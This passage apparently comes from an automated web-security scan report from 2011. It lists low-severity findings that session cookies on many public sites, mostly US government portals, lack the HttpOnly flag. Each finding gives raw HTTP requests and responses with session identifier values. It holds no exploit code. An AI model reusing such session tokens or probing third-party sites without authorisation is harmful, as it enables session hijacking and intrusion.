Set-Cookie: nflxsid=228.1304167179999; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=228.248e0eb2-56d6-49b8-8ce4-136c86f739a1; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717999968228; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


14.188. http://www.nist.gov/search-results.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nist.gov
Path:   /search-results.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search-results.cfm?q=xss.cx&btng=Search&num=10&sortType=L&scopeType=0&datefrom=&dateto= HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://www.nist.gov/srd/onlinelist.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:13 GMT
Server: Apache
Set-Cookie: CFID=17042990;path=/
Set-Cookie: CFTOKEN=54636047;path=/
Last-Modified: Tue, 4 Jan 2011 22:32:06 GMT
NIST: g3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 18308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...

14.189. http://www.nmshtd.state.nm.us/main.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nmshtd.state.nm.us
Path:   /main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.asp HTTP/1.1
Host: www.nmshtd.state.nm.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
publisher: Quantum Art's Q-Publishing 7.5 (http://www.quantumart.com) Sun, 02 Jan 2011 23:11:38 GMT
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
Location: /mainpage.asp
Content-Length: 134
Content-Type: text/html; Charset=windows-1252
Expires: Fri, 29 Apr 2011 19:56:10 GMT
Set-Cookie: ASPSESSIONIDSSQCQTCC=NJBPPCFBHEDFBBHHKNBAGBFM; path=/
Cache-control: Private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/mainpage.asp">here</a>.</body>

14.190. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/cmd/RetLogin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/cmd/RetLogin HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EBB9219073261073022FCEC122287B10; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: JSESSIONID=0001ACicLnN7eR8w5L7FAtdHBJX:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 7645


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html lang
...[SNIP]...

14.191. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

14.192. https://www.nrsservicecenter.com/iApp/ret/landing.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDEE6218732610730181C1E2C63083C9; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001mmfBFC8Kymw5lCom8cv4BX4:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...

14.193. https://www.nrsservicecenter.com/iApp/ret/showPage.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDD8FB4E7326107300A08C7B1CB4C778; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001YFkAdRMz04gilI2jygmcFCj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 8439


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...

14.194. http://www.ok.gov/genthree/get_resized_image.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ok.gov
Path:   /genthree/get_resized_image.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /genthree/get_resized_image.php?photo_gallery_id=2178 HTTP/1.1
Host: www.ok.gov
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:06 GMT
Server: Apache
Set-Cookie: PHPSESSID=2q6jbqjv2iob9m31v25j9cfea1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/jpeg
Content-Length: 8738

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

14.195. http://www.ok.gov/genthree/rt_get_resized_image.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ok.gov
Path:   /genthree/rt_get_resized_image.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /genthree/rt_get_resized_image.php?photo_gallery_id=2178 HTTP/1.1
Host: www.ok.gov
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:07 GMT
Server: Apache
Set-Cookie: PHPSESSID=rhrgjbm52gh9bsut7aaetivl72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 774
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 50
...C......
........(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bccccccccccccccccccccccccccccccc
...[SNIP]...

14.196. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:09 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=vg3vmlsoshfa39r3kb5kj5jrq0; expires=Mon, 23-May-2011 00:52:29 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 29 Apr 2011 21:17:31 GMT
ETag: "4bacb78b273b8f8819eb563a375e8dce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.197. http://www.p2pays.org/ref/07/06568/2001/nframe.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.p2pays.org
Path:   /ref/07/06568/2001/nframe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/07/06568/2001/nframe.asp HTTP/1.1
Host: www.p2pays.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:39:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: ./
Content-Length: 123
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQDSDCQD=MJHANNNBCJIPPKHFKILHHBDA; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="./">here</a>.</body>

14.198. http://www.pa.gov/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pa.gov
Path:   /portal/server.pt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt HTTP/1.1
Host: www.pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:39:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.pa.gov/portal/server.pt/community/pa_gov/2966
Set-Cookie: ASP.NET_SessionId=uxvkrryzpoggxs5521qr12jx; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 389

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.pa.gov/portal/server.pt/community/pa_gov/2966">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--
...[SNIP]...

14.199. http://www.portal.state.pa.us/portal/server.pt/document/1036792/corbettwebphoto_jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.portal.state.pa.us
Path:   /portal/server.pt/document/1036792/corbettwebphoto_jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt/document/1036792/corbettwebphoto_jpg HTTP/1.1
Host: www.portal.state.pa.us
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/community/pa_gov/2966
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PTGW-STREAMING: Yes
Content-Language: en
Content-Disposition: attachment; filename=CorbettWebPhoto.jpg
Set-Cookie: ASP.NET_SessionId=hb0moyew3nvxld45vyymmf45; path=/
Expires: 0
Cache-Control: private
Content-Type: image/pjpeg
Content-Length: 9254

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

14.200. http://www.psp.state.pa.us/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.psp.state.pa.us
Path:   /portal/server.pt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt HTTP/1.1
Host: www.psp.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:40:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.psp.state.pa.us/portal/server.pt/community/psp/4451
Set-Cookie: ASP.NET_SessionId=w4j44aee1iyy3r45suivlhnt; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 395

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.psp.state.pa.us/portal/server.pt/community/psp/4451">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCIS
...[SNIP]...

14.201. http://www.qualityinfo.org/olmisj/OlmisZine  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.qualityinfo.org
Path:   /olmisj/OlmisZine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olmisj/OlmisZine HTTP/1.1
Host: www.qualityinfo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=F497D08E36FD5F67806540814E0ECF4D; Path=/olmisj
Vary: Accept-Encoding
Connection: close
Content-Length: 28792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /
...[SNIP]...

14.202. http://www.real.com/realplayer  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.real.com
Path:   /realplayer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /realplayer HTTP/1.1
Host: www.real.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: JSESSIONID=BD5220AADC49692F465066534E191CF4; Path=/realcom
Set-Cookie: rntrack=src=realplayer&opage=realplayer; Domain=.real.com; Expires=Sat, 30 Apr 2011 13:10:04 GMT; Path=/;
Set-Cookie: rnseo=; Domain=.real.com; Path=/;
Set-Cookie: NSC_Sfbmdpn-bqq.sfbm.dpn-80=ffffffffaf16e47045525d5f4f58455e445a4a4229a0;expires=Sat, 30-Apr-2011 14:04:18 GMT;path=/;httponly
Connection: close
Content-Length: 26892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

14.203. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.reserveamerica.com
Path:   /la/state/campgrounds/r/campgroundDirectoryList.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /la/state/campgrounds/r/campgroundDirectoryList.do HTTP/1.1
Host: www.reserveamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Sat, 30 Apr 2011 12:40:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 30 Apr 2011 12:40:05 GMT
Content-Length: 9358
Connection: close
Set-Cookie: JSESSIONID=DB82248EA6CA35E930BE62F48663F998.web03-ny; Path=/
Set-Cookie: _rauv_=DB82248EA6CA35E930BE62F48663F998.web03-ny_; Domain=.reserveamerica.com; Expires=Fri, 25-Apr-2031 12:40:05 GMT; Path=/
Set-Cookie: _rauv_=DB82248EA6CA35E930BE62F48663F998.web03-ny_; Domain=.reserveamerica.com; Expires=Fri, 25-Apr-2031 12:40:05 GMT; Path=/
Set-Cookie: NSC_QSPE-VXQ-IUUQ=4472140525b9;Version=1;Max-Age=3600;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Strict//EN">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://openg
...[SNIP]...

14.204. http://www.scdmvonline.com/DMVNew/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scdmvonline.com
Path:   /DMVNew/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DMVNew/default.aspx HTTP/1.1
Host: www.scdmvonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:40:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=zvctocubhldxfy45vejxiw45; path=/
Set-Cookie: VisitCount=1; expires=Mon, 30-Apr-2012 12:40:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>SC Department of Motor Vehicles</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"
...[SNIP]...

14.205. http://www.sled.state.sc.us/sled/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sled.state.sc.us
Path:   /sled/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sled/default.asp HTTP/1.1
Host: www.sled.state.sc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 426
Content-Type: text/html
Set-Cookie: CISESSIONID=c6f5ffb02e2c8078087af7ec0a2c9265ICE370; path=/
Set-Cookie: ASPSESSIONIDASDSSDTS=FFNHDODBCKEILHGEGHEKEHPJ; path=/
Cache-control: private

<html>
<head>
<title>South Carolina Law Enforcement Division</title>
</head>
<script>
parent.banner.location = 'http://www.sled.state.sc.us/sled/default.asp?Category=main&Service=defaultTop';
pa
...[SNIP]...

14.206. http://www.sus.edu/CatSubCat/CatSubCat.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sus.edu
Path:   /CatSubCat/CatSubCat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CatSubCat/CatSubCat.asp HTTP/1.1
Host: www.sus.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15055
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCRQTASB=MMPPEHIBJMEGLOECNIIKPHHK; path=/
Cache-control: private


<link rel="stylesheet" href="/Includes/StyleMain.asp" type="text/css" />
<link rel='stylesheet' href='/_CustomFiles/StyleSite.asp' type='text/css' />
<html xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

14.207. http://www.tanfa.co.uk/archives/show.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tanfa.co.uk
Path:   /archives/show.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/show.asp HTTP/1.1
Host: www.tanfa.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:40:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
